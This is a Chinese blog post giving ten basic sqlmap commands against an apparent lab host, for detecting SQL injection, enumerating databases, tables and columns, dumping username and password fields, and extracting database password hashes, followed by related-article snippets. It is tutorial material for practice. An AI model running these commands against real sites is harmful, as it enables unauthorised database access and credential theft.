sqlmap 基本用法

已于 2023-07-23 11:42:21 修改
阅读量173 收藏
点赞数
分类专栏: 乱写一通 文章标签: 笔记
于 2023-07-23 11:41:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76881678/article/details/131877657
版权

1.判断是否存在注入

命令实例:sqlmap.py -u http://pu2lh35s.ia.aqlab.cn/?id=1 

        **注意:当注入点后面的参数大于或者等于两个时,需要加双引号sqlmap.py -u "http://pu2lh35s.ia.aqlab.cn/?id=1"

2.判断文本中的请求是否存在注入

命令实例:sqlmap.py -r desktop/1.txt

使用该命令是需要指明1.txt(保存着http请求 bp抓包有)文件所在绝对路径

3.查询当前用户下的所有数据库

命令实例:sqlmap.py -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --dbs

4.数据库的表名

命令实例:sqlmap.py -u "http://pu2lh35s.ia.aqlab.cn/?id=1" -D 库名 --tables

5.表中的字段名

命令实例:sqlmap.py -u "http://pu2lh35s.ia.aqlab.cn/?id=1" -D 库名 -T 表名 --columns)

6.字段内容

命令实例:sqlmap.py -u "http://pu2lh35s.ia.aqlab.cn/?id=1" -D 库名 -T 表名 - C 字段名(username,password) --dump

7.浏览数据库的所有用户

命令实例:sqlmap.py -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --users

**注意:如果在当前用户有权限读取包含所有用户的表的权限时,使用这个命令可以列出所有管理用户。

8.获取数据库的密码

命令实例:sqlmap.py -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --passwords

**注意:如果当前用户有读取包含文件密码的权限,sqlmap会先列举出用户,然后列出Hash,并尝试破解,(一般是加密的密文)

9.获取当前用户数据库的名称

命令实例:sqlmap.py -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --current-db

10.使用当前网站数据库的用户名称

命令实例:sqlmap.py -u "http://pu2lh35s.ia.aqlab.cn/?id=1" --current-user

小鹏新手
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap使用教程
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
sqlmap基本用法
Oavinci的博客
06-19 550
最近处于查缺补漏阶段,再重温一遍sqlmap… 写的都是sqlmap最最最基本用法记录(虽然现在能用sqlmap做的题不多了… 我这里对sqli-labs-master第一关进行测试(文字是Windows跑sqlmap命令,图片演示使用的是kali自带的sqlmap) 1、检测注入点 使用-u参数进行设置注入点URL,如果要指定注入的参数,可以使用-p,这里只有一个注入点也可不...
sqlmap注入总结
weixin_34321753的博客
08-22 1450
本实验是基于DVWA和sqli-labs的实验环境实验平台搭建:下载Wamp集成环境,并下载DVWA和sqli-labs和压缩包解压至wamp\www的目录下。安装只要注意Wamp环境的数据库名和密码对应即可。sqlmap里涉及到的sql注入原理,请参考http://wt7315.blog.51cto.com/10319657/1828167,实验环境也是基于sqli-lab...
SQLMAP基本用法
m0_52137715的博客
11-20 721
sqlmap基本使用
sqlmap基本使用方法
qq_54030686的博客
06-28 3385
本文只介绍sqlmap的简单使用方法,参考官方文档csdn师傅个人建议,具体参数直接看csdn师傅的即可,本文以DC9靶场作为目标进行练习,使用sqlmap获取目标数据或权限GET型 输入自己的目标地址 自动输入选项的属性值 设置测试的等级(1-5,默认为1)lv2:cookie注入; lv3:user-agent注入,lv4:refere注入; lv5:host注入 POST型 可以获取对应地址的请求包,使用bp抓包保存即可 或者 选择传参的方式 选择传入的参数 采用随机UA头 查看当
Sqlmap基本使用方法
BAIXUAN9527的博客
03-25 329
Sqlmap安装 get有时需要登录才能使用 get基本使用方法: 如果是kail的话直接sqlmap -u 就好了 post的使用方法 其余和get后面的参数一样
sqlmap基本用法及实例
whoim_i的博客
10-21 1090
这里`在这里插入代码片`写自定义目录标题一、 sqlmap介绍二 、sqlmap基本用法三、实例使用sqlmap实现自动化注入攻击,对操作系统命令进行操作 一、 sqlmap介绍 sqlmap 是一个自动化的 SQL 注入工具,其主要功能是扫描,发现并利用给定的 URL 进行SQL注入。 Sqlmap 采用了以下 5 种独特的 SQL 注入技术 1、基于布尔类型的盲注,即可以根据返回页面判断条件真...
kali工具SQLmap基本使用方法流程以及命令解析
FRANXX_02的博客
10-06 5903
kali工具SQLmap基本使用方法流程以及命令解析
sqlmap基本用法详解(2)
m0_46256056的博客
07-06 717
sqlmap用法详解233 可以自动检测并利用sql注入漏洞,对于简单题可以直接使用sqlmap得到flag。 遇到waf的情况,可以调用自带的一些tamper,或者自己编写tamper来进行绕过,得到flag,burp中也有sqlmap相关插件。 一、常用参数 参数 作用 -h, --help 显示帮助文档 -u URL, --url=URL 对指定IP进行扫描 -r REQUESRT_FILE REQUESRT_FILE为包含HTTP请求的数据包文件,可以从Burp中导出
SQLmap压缩包,SQLmap压缩包
06-07
使用SQLmap时,你需要了解基本的命令行选项,例如指定目标URL、选择测试方法、设置代理等。同时,了解如何正确和合法地使用这个工具至关重要,避免对未经授权的系统进行测试,以免触犯法律。 总的来说,SQLmap是一...
sqlmap基本用法和联合注入
weixin_44098523的博客
02-02 1940
sqlmap基本用法 cookie注入:sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的...
sqlmap基本使用方法
08-24
- *2* *3* [sqlmap基本使用方法](https://blog.csdn.net/jayjaydream/article/details/108555660)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
sqlmap基本使用方法
08-23
下面是SQLMap基本使用方法: 1. 下载和安装:你可以从SQLMap的官方网站(https://sqlmap.org/)下载最新的版本。解压缩后,你可以直接运行sqlmap.py文件。 2. 目标URL:使用以下命令指定要测试的目标URL: ``` ...
软件测试学习笔记丨Pytest配置文件
ceshiren_com的博客
08-27 4304
pytest.ini是pytest的配置文件;可以修改pytest的默认行为;不能使用任何中文符号,包括汉字、空格、引号、冒号等。
12306项目学习笔记(框架篇Base)
qq_74851649的博客
08-30 777
首先学习的是基础框架提供了一种静态方式来访问Spring容器中的Bean,适用于某些特定场景,如工具类和框架集成。在12306项目中由于我们引入了RocketMQ消息队列,这些库的对象通常不是Spring管理的,无法直接使用@Autowired注入,所以需要类提供一种静态方式来访问Spring容器中的Bean。比如在我们的TicketServiceImpl中的bean对象就是用以下方法获取的。
【学习笔记】卫星通信NTN 3GPP标准化进展分析(六)- 参考标准
最新发布
u011376987的博客
09-01 700
本文总结了NTN标准化进程以及后续的研究计划,是学习NTN协议的入门。本文来自3GPP Joern Krause, 3GPP MCC。
p2p、分布式,区块链笔记:基于IPFS实现的数据库orbitdb笔记
ResumeProject的博客
08-26 831
p2p、分布式,区块链笔记:基于IPFS实现的数据库orbitdb笔记,自定义events类型的数据库
MATLAB学习笔记3
probably121的博客
08-28 910
例如,通过[X, Y] = meshgrid(x, y);函数返回值:函数可以返回多个输出参数,例如 function [sum, product] = calculate(x, y),sum=x+y;匿名函数和内联函数:匿名函数使用@(args) expression的形式,内联函数使用inline('string')的形式,它们适用于简单的、单行的函数定义。多图绘制:subplot函数允许在一个窗口内分区域绘制多个图,如 subplot(2, 2, 1) 会在2x2的图形布局的第1个位置绘制图形。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值